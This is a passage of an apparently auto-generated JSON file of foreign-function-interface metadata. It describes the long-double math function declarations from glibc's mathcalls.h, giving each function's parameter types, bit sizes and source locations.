space>:87:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__frexpl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:98:1 <Spelling=<scratch space>:89:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "ldexpl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:101:1 <Spelling=<scratch space>:90:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__ldexpl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:101:1 <Spelling=<scratch space>:92:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "logl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:104:1 <Spelling=<scratch space>:95:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__logl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:104:1 <Spelling=<scratch space>:97:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "log10l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:107:1 <Spelling=<scratch space>:98:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__log10l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:107:1 <Spelling=<scratch space>:100:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "modfl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:110:1 <Spelling=<scratch space>:101:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__iptr", "type": { "tag": ":pointer", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__modfl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:110:1 <Spelling=<scratch space>:103:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__iptr", "type": { "tag": ":pointer", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "expm1l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:119:1 <Spelling=<scratch space>:105:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__expm1l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:119:1 <Spelling=<scratch space>:107:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "log1pl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:122:1 <Spelling=<scratch space>:108:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__log1pl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:122:1 <Spelling=<scratch space>:110:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "logbl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:125:1 <Spelling=<scratch space>:111:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__logbl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:125:1 <Spelling=<scratch space>:113:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "exp2l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:130:1 <Spelling=<scratch space>:114:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__exp2l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:130:1 <Spelling=<scratch space>:116:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "log2l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:133:1 <Spelling=<scratch space>:117:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__log2l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:133:1 <Spelling=<scratch space>:119:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "powl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:140:1 <Spelling=<scratch space>:122:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__powl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:140:1 <Spelling=<scratch space>:124:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "sqrtl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:143:1 <Spelling=<scratch space>:125:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__sqrtl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:143:1 <Spelling=<scratch space>:127:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "hypotl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:147:1 <Spelling=<scratch space>:128:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__hypotl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:147:1 <Spelling=<scratch space>:130:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "cbrtl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:152:1 <Spelling=<scratch space>:131:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__cbrtl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:152:1 <Spelling=<scratch space>:133:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "ceill", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:159:1 <Spelling=<scratch space>:134:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__ceill", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:159:1 <Spelling=<scratch space>:136:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "fabsl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:162:1 <Spelling=<scratch space>:137:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__fabsl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:162:1 <Spelling=<scratch space>:139:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "floorl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:165:1 <Spelling=<scratch space>:140:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__floorl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:165:1 <Spelling=<scratch space>:142:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "fmodl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:168:1 <Spelling=<scratch space>:143:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__fmodl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:168:1 <Spelling=<scratch space>:145:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "isinfl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:177:1 <Spelling=<scratch space>:146:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "finitel", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:182:1 <Spelling=<scratch space>:147:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "dreml", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:185:1 <Spelling=<scratch space>:148:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__dreml", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:185:1 <Spelling=<scratch space>:150:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "significandl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:189:1 <Spelling=<scratch space>:151:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__significandl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:189:1 <Spelling=<scratch space>:153:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "copysignl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:196:1 <Spelling=<scratch space>:154:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__copysignl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:196:1 <Spelling=<scratch space>:156:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "nanl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:201:1 <Spelling=<scratch space>:157:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tagb", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__nanl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:201:1 <Spelling=<scratch space>:159:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tagb", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "isnanl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:211:1 <Spelling=<scratch space>:160:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "j0l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:217:1 <Spelling=<scratch space>:161:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__j0l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:217:1 <Spelling=<scratch space>:163:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "j1l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:218:1 <Spelling=<scratch space>:164:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__j1l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:218:1 <Spelling=<scratch space>:166:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "jnl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:219:1 <Spelling=<scratch space>:167:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__jnl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:219:1 <Spelling=<scratch space>:169:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "y0l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:220:1 <Spelling=<scratch space>:170:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__y0l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:220:1 <Spelling=<scratch space>:172:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "y1l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:221:1 <Spelling=<scratch space>:173:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__y1l", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:221:1 <Spelling=<scratch space>:175:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "ynl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:222:1 <Spelling=<scratch space>:176:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__ynl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:222:1 <Spelling=<scratch space>:178:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "erfl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:228:1 <Spelling=<scratch space>:179:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__erfl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:228:1 <Spelling=<scratch space>:181:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "erfcl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:229:1 <Spelling=<scratch space>:182:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__erfcl", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:229:1 <Spelling=<scratch space>:184:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "lgammal", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:230:1 <Spelling=<scratch space>:185:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__lgammal", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:230:1 <Spelling=<scratch space>:187:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "tgammal", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:235:1 <Spelling=<scratch space>:188:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__tgammal", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:235:1 <Spelling=<scratch space>:190:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "gammal", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:241:1 <Spelling=<scratch space>:191:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "__gammal", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:241:1 <Spelling=<scratch space>:193:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }, { "tag": "function", "name": "lgammal_r", "ns": 0, 